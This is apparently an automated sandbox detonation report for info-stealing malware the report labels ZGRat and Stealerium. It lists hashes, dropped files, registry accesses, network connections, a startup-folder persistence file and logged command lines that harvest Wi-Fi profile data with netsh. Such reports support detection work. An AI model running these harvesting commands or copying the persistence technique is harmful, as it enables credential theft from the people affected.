| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1868-6-0x0000000005A80000-0x0000000005AE6000-memory.dmp
memory/1868-17-0x0000000005DF0000-0x0000000006144000-memory.dmp
memory/1868-18-0x00000000061F0000-0x000000000620E000-memory.dmp
memory/1868-19-0x00000000062A0000-0x00000000062EC000-memory.dmp
memory/1868-20-0x0000000004D20000-0x0000000004D30000-memory.dmp
memory/1868-23-0x0000000006780000-0x00000000067A2000-memory.dmp
memory/1868-24-0x00000000078C0000-0x0000000007E64000-memory.dmp
memory/1868-22-0x0000000006710000-0x000000000672A000-memory.dmp
memory/1868-21-0x0000000007270000-0x0000000007306000-memory.dmp
memory/1868-25-0x00000000084F0000-0x0000000008B6A000-memory.dmp
memory/4080-42-0x0000000071570000-0x0000000071D20000-memory.dmp
memory/1868-44-0x0000000071570000-0x0000000071D20000-memory.dmp
memory/4080-43-0x00000000057C0000-0x00000000057C6000-memory.dmp
memory/4080-41-0x0000000000FE0000-0x0000000000FF4000-memory.dmp
C:\Users\Admin\AppData\Roaming\yagacrypt.exe
| MD5 | d9c253eaa73b4a33b91def3e863d644e |
| SHA1 | 626c26f275e691183fa48b68daf586e24960cc3e |
| SHA256 | 45474eaa30615f25da4e0f31447222de844cfea4375eaff3a6d9adf19101e654 |
| SHA512 | 5041ca9cce11cc44a11525eac5944a5fd21652b53794f4c2eb656f33d7d2e8cf2bd7ee25304a829578e57869b77d36c624059108ab8f018ef85ab673efc391c7 |
C:\Users\Admin\AppData\Roaming\RIB.pdf
| MD5 | ac6f4727f46bff3bd3f71550ae96c15f |
| SHA1 | 5966b42c1989bf6886c887a29480bd8a249476ee |
| SHA256 | 580b5d3ab9575c944f5f15f42fe82a5024411a68f759ee7137e0403ac2b568e0 |
| SHA512 | 734a98dd5dad4674bd56b6138a94580be819c77ec3945901053b6c9f9a8bd34f4975f3a71b363ca257bfe0187cebe52bbb65fc262cb59f923396f5c2cebe737a |
C:\Users\Admin\AppData\Roaming\yagacrypt.exe
| MD5 | 220f7a6283256dfda65a5879cb7d8afc |
| SHA1 | b640bc6f963b8cdc8104fb8f99ca7b3a34a510b0 |
| SHA256 | bac0966abfbc560de0f8802564fc5bc95e8492f838b394404641183a27c30b37 |
| SHA512 | e7e88895d26431f84c71b69c27b2549f7ecc5b2e473c3dc3c4f3bf52439d98d6e01e3640d142b8d0fe0a3e9da1b1efcd8b6a3233d86848ad53787e6c73014f89 |
C:\Users\Admin\AppData\Roaming\yagacrypt.exe
| MD5 | 0abd42634db4f4fb3bbbcaa066413d68 |
| SHA1 | 074f62ae3b24d775f09e98e81e857e6f1be05f3b |
| SHA256 | a2ac7be629121924985b42fdf34380efe12be78a3d8665b625a2eae80808cff4 |
| SHA512 | 578ef89e668c8e38e66353f485be2b90ebf8ec21bcf0f5de0ec65ee0710b55256876f28219e540beaf2dea41224c51355dc9a39930cfa3b231b3450264ac47d2 |
memory/4080-46-0x0000000006360000-0x000000000648A000-memory.dmp
memory/4080-47-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-52-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-54-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-50-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-58-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-66-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-72-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-78-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-82-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-90-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-96-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-100-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-102-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-104-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-108-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-110-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-106-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-98-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-94-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-92-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-88-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-86-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-84-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-80-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-76-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-74-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-70-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-68-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-64-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-62-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-60-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-56-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-48-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-992-0x00000000064B0000-0x00000000064B1000-memory.dmp
memory/4080-997-0x0000000006790000-0x00000000067DC000-memory.dmp
memory/4080-996-0x0000000006690000-0x0000000006750000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | b30d3becc8731792523d599d949e63f5 |
| SHA1 | 19350257e42d7aee17fb3bf139a9d3adb330fad4 |
| SHA256 | b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3 |
| SHA512 | 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | 752a1f26b18748311b691c7d8fc20633 |
| SHA1 | c1f8e83eebc1cc1e9b88c773338eb09ff82ab862 |
| SHA256 | 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131 |
| SHA512 | a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5 |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/556-1111-0x0000000000400000-0x000000000049C000-memory.dmp
memory/556-1115-0x0000000004E00000-0x0000000004EE8000-memory.dmp
memory/556-1114-0x0000000002980000-0x0000000002990000-memory.dmp
memory/556-1113-0x0000000071570000-0x0000000071D20000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yagacrypt.exe.log
| MD5 | c3941d9fa38f1717d5cecd7a2ca71667 |
| SHA1 | 33b5362675383b58b4166ed9f9a61e5aa6768d2e |
| SHA256 | f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256 |
| SHA512 | 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45 |
memory/4080-1112-0x0000000071570000-0x0000000071D20000-memory.dmp
memory/556-3349-0x0000000004F80000-0x0000000004FD6000-memory.dmp
memory/556-3355-0x0000000005650000-0x00000000056A4000-memory.dmp
memory/556-3357-0x0000000071570000-0x0000000071D20000-memory.dmp
memory/392-3358-0x000001AA3D780000-0x000001AA3D7A2000-memory.dmp
memory/392-3368-0x00007FFCA0130000-0x00007FFCA0BF1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 569124b0982577268dcbc9070e76fea0 |
| SHA1 | 149910730a6bc3a691d8df4dafb3cc12fd625496 |
| SHA256 | b3f8175d4f6cb09f6d2f912e1bf6d31caeaa5aa16abb84831051c883f16e7ec1 |
| SHA512 | fb34ef6fc5f61a16112e1fb1223f07a9d309e7871638d8792435e56ca4a8201b953d51047d264505bdd420898602d96419380f0ad0b68ae474c0b4a583ffaf95 |
memory/392-3369-0x000001AA229D0000-0x000001AA229E0000-memory.dmp
memory/392-3373-0x00007FFCA0130000-0x00007FFCA0BF1000-memory.dmp
C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe
| MD5 | d9978a7bc703072527518ec65490fabb |
| SHA1 | 4cfc423812a29a857dd4d7db38bb648be228df30 |
| SHA256 | edfc6d7d35c07e5cd1f9fa65b8c4861adaa39ef7091fe14c51b87a1d4932e5e5 |
| SHA512 | c3f248557d1c35f1d7ec5a96fbf784e52110fecaefcb82001426b996b58e43154e57c37484b3be974efac8e7b494d69a755808910af3e10fd82edc15a0ee6222 |
memory/3152-3395-0x0000000005480000-0x0000000005490000-memory.dmp
memory/3152-3394-0x0000000071660000-0x0000000071E10000-memory.dmp
memory/3152-4328-0x0000000005FE0000-0x0000000005FE1000-memory.dmp
memory/1592-4341-0x00000000057B0000-0x00000000057C0000-memory.dmp
memory/3152-4342-0x0000000071660000-0x0000000071E10000-memory.dmp
memory/1592-4340-0x0000000071660000-0x0000000071E10000-memory.dmp
memory/1092-6584-0x0000000071660000-0x0000000071E10000-memory.dmp
memory/1092-6585-0x0000000005240000-0x0000000005250000-memory.dmp
memory/1592-6586-0x0000000071660000-0x0000000071E10000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/2784-7257-0x00007FFCA13F0000-0x00007FFCA1EB1000-memory.dmp
memory/2784-7278-0x0000016305F40000-0x0000016305F50000-memory.dmp
memory/2784-7299-0x0000016305F40000-0x0000016305F50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9b80cd7a712469a4c45fec564313d9eb |
| SHA1 | 6125c01bc10d204ca36ad1110afe714678655f2d |
| SHA256 | 5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d |
| SHA512 | ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584 |
memory/1092-7534-0x0000000005B40000-0x0000000005B41000-memory.dmp
memory/2784-7533-0x0000016305F40000-0x0000016305F50000-memory.dmp
memory/2784-7535-0x0000016305F40000-0x0000016305F50000-memory.dmp
memory/2784-7537-0x00007FFCA13F0000-0x00007FFCA1EB1000-memory.dmp
memory/1092-7544-0x0000000071660000-0x0000000071E10000-memory.dmp
memory/1092-7545-0x0000000005240000-0x0000000005250000-memory.dmp
memory/1708-7549-0x0000000071660000-0x0000000071E10000-memory.dmp
memory/1092-7550-0x0000000071660000-0x0000000071E10000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ggiac.exe
| MD5 | f3ed43acd7d035e8c6035c7d65ec60bf |
| SHA1 | 679c01b051cbd42b740a05f0cd2807b16bae5aec |
| SHA256 | 136f29247b40b1cd3e65d093fd0529d6115ade980092b6a950d461b5c046daef |
| SHA512 | fc5b4dd5abc2e8e141b25ed4bd77509a0af1ce24b695e44b563ad93192f74c0dd147e4eb0e9da7052459b4dec975d6c99d842f77dc4e002a3631dc27a9ff4db5 |
memory/3416-9795-0x0000000000140000-0x000000000015C000-memory.dmp
memory/1708-9796-0x0000000071660000-0x0000000071E10000-memory.dmp
memory/3416-9798-0x0000000004B10000-0x0000000004B20000-memory.dmp
memory/3416-9797-0x0000000071660000-0x0000000071E10000-memory.dmp
memory/3416-9799-0x00000000054E0000-0x0000000005616000-memory.dmp
memory/1708-10073-0x0000000005730000-0x0000000005740000-memory.dmp
memory/3416-10739-0x0000000004B00000-0x0000000004B01000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Data\Downloads.txt
| MD5 | ae0f7fab163139c661e576fe0af08651 |
| SHA1 | 7545ab94360fd93f2209021b4cecabb92592be27 |
| SHA256 | 832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657 |
| SHA512 | a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b |
Analysis: behavioral24
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Detect ZGRat V1
Stealerium
ZGRat
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe | C:\Users\Admin\AppData\Local\Temp\loaderX.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe | C:\Users\Admin\AppData\Local\Temp\loaderX.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\loaderX.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2600 set thread context of 3764 | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\loaderX.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe
"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe"
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe
C:\Users\Admin\AppData\Local\Temp\loaderX.exe
"C:\Users\Admin\AppData\Local\Temp\loaderX.exe"
C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\SysWOW64\findstr.exe
findstr All
C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Network
| Country | Destination | Domain | Proto |
| GB | 96.16.110.114:80 | | tcp |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 40.126.32.133:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| SE | 192.229.221.95:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 138.91.171.81:80 | | tcp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 208.95.112.1:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 149.154.167.220:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 162.159.135.233:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 104.18.115.97:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 52.167.249.196:443 | | tcp |
| SE | 192.229.221.95:80 | | tcp |
| N/A | 40.126.32.133:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 152.199.19.74:80 | | tcp |
| N/A | 52.140.118.28:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 104.18.115.97:80 | | tcp |
| N/A | 52.140.118.28:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 20.114.59.183:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 51.178.66.33:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 136.175.8.205:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 13.95.31.18:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 20.114.59.183:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 20.114.59.183:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 104.77.160.23:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 104.18.115.97:80 | | tcp |
| N/A | 162.159.135.233:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| GB | 96.16.110.114:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| GB | 96.17.179.34:80 | | tcp |
| GB | 96.16.110.114:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| GB | 96.16.110.114:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 52.111.229.48:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | 192.98.74.40.in-addr.arpa | udp |
Files
memory/2600-1-0x00000000745C0000-0x0000000074D70000-memory.dmp
memory/2600-0-0x0000000000C50000-0x0000000000C5E000-memory.dmp
memory/2600-2-0x00000000056C0000-0x00000000056D0000-memory.dmp
memory/2600-3-0x0000000007200000-0x0000000007768000-memory.dmp
memory/2600-7-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-9-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-11-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-15-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-17-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-19-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-23-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-21-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-27-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-29-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-31-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-33-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-35-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-39-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-41-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-45-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-47-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-51-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-53-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-57-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-55-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-61-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-65-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-63-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-67-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-59-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-49-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-43-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-37-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-25-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-13-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-5-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-4-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-936-0x0000000002F70000-0x0000000002F71000-memory.dmp
memory/2600-937-0x0000000008E30000-0x0000000009330000-memory.dmp
memory/2600-938-0x0000000006FD0000-0x000000000701C000-memory.dmp
memory/2600-939-0x0000000008190000-0x0000000008734000-memory.dmp
memory/2600-943-0x00000000745C0000-0x0000000074D70000-memory.dmp
memory/3764-945-0x0000000000400000-0x0000000000C0A000-memory.dmp
memory/3764-944-0x00000000745C0000-0x0000000074D70000-memory.dmp
memory/3764-947-0x0000000005260000-0x0000000005270000-memory.dmp
memory/3764-948-0x00000000052B0000-0x00000000052BA000-memory.dmp
memory/3764-946-0x00000000050C0000-0x0000000005152000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xw.exe.log
| MD5 | c3941d9fa38f1717d5cecd7a2ca71667 |
| SHA1 | 33b5362675383b58b4166ed9f9a61e5aa6768d2e |
| SHA256 | f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256 |
| SHA512 | 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45 |
C:\Users\Admin\AppData\Local\Temp\build.exe
| MD5 | a90e4f6bdd44a71e2246160693884539 |
| SHA1 | 940ebec474e0b4d87dc4f06f37a1d32d2315cf56 |
| SHA256 | b2c5ecae8bdeb480fb306372d7a12d943531bd0de1b15f45168ba659f25694d4 |
| SHA512 | 9a7fcd588ef5842798481bacfb7b32dd57efe06db3c852c69916d0045f806894d475ccf8f52bed942a35f4160bb6c3be7d635b17928d29148318c2858b62d937 |
memory/5112-978-0x0000015A3DAD0000-0x0000015A3DC48000-memory.dmp
memory/4924-977-0x00000000008A0000-0x0000000000A32000-memory.dmp
memory/5112-980-0x00007FFADC100000-0x00007FFADCBC1000-memory.dmp
memory/4924-982-0x00000000745C0000-0x0000000074D70000-memory.dmp
memory/5112-983-0x0000015A58300000-0x0000015A58310000-memory.dmp
memory/3764-981-0x00000000745C0000-0x0000000074D70000-memory.dmp
memory/4924-979-0x00000000052E0000-0x0000000005346000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\build.exe
| MD5 | aeb20a62dc5daec0e2f60165f9829b07 |
| SHA1 | fdafa16dfbd0d2d6a1f88add8db1120721edead2 |
| SHA256 | 08b11f91e2081d5ddf637d64784c4101ec65653d36299a7a22d9b457aae65a14 |
| SHA512 | 388f9d76bf79d9c5e53a4c994ff9853356b6a0f2c5ef7feae84813f1be1d3a2c09e1838a3286acf980e66a270028595191cd35dd6593a920a8862b3cf10e387b |
C:\Users\Admin\AppData\Local\Temp\build.exe
| MD5 | dcf0f2f524e0e1d2752f64dc7fce8ea0 |
| SHA1 | 4cb2ae016e67f7fa88d9598313f6092fffc55559 |
| SHA256 | bf6796861138edc7e2eb7807fd388d91922408853c8dccb495aca889dd2e89b6 |
| SHA512 | fea9118e846801b82bb04c057624ab727c3f4116c7c194164da49f6541cfad65daa70e6a5c5dfc8f148e75ac5b96763b18dcf6a427c01fa4f8a7ab2b4aa51330 |
C:\Users\Admin\AppData\Local\Temp\loaderX.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/5112-985-0x0000015A5A390000-0x0000015A5A3E0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\loaderX.exe
| MD5 | 6e0741d4586628386a6f1df47a03655e |
| SHA1 | 610950a24bb3c8b318130ffb98690ecba89c1018 |
| SHA256 | 65a5758d31c44e29e26a3444333ed585e13117daed14bff83e33df06ad9133f7 |
| SHA512 | 4a3e09b6f5c6a33a9c919477b488aef6d3bf18e793fa3ff82dd105015b95ba0cd4451e52fbcf5ff5c9e37bc138856aaa5d83a18529512fdc4794eaff9a401393 |
C:\Users\Admin\AppData\Local\Temp\Data\CreditCards.txt
| MD5 | 0f5f7a38759e578c92bcf62c45d80b8a |
| SHA1 | 211e70ede55cce5bf67f685d85cbd030a8517d2b |
| SHA256 | 39059fc9bf3844dacbe329b623ca7a06f72656216dd4e52dc9b938b3d95289dc |
| SHA512 | 8130466f8ee346c0b931a34e63e2e9dc6f4070b85faaa58efdddd4d165fa605457d3137472c5fd09da87b0135a4beb660ee39cb390d78be6f0786950036b205d |
C:\Users\Admin\AppData\Local\Temp\loaderX.exe
| MD5 | 45ea343e335d2d6400ccbc1e3fc85f11 |
| SHA1 | 7f2267d1f27a076e284696c30a4cf4768fd1a52f |
| SHA256 | f38fbc005bcaadb661f8f57f00eb44960e27a1cbf4c4012c3f27834e62a9c203 |
| SHA512 | c7689143605327ed63d967b81e7eb8eecf786b5273d772209d7581fc36517953b686a4c8196f9100acf026e9e8c5edc7724e5f0f77d0c982377dfd5d039e33a1 |
memory/4924-1018-0x0000000002CA0000-0x0000000002CB0000-memory.dmp
memory/5112-1027-0x00007FFADC100000-0x00007FFADCBC1000-memory.dmp
memory/4924-1031-0x00000000058A0000-0x00000000058C6000-memory.dmp
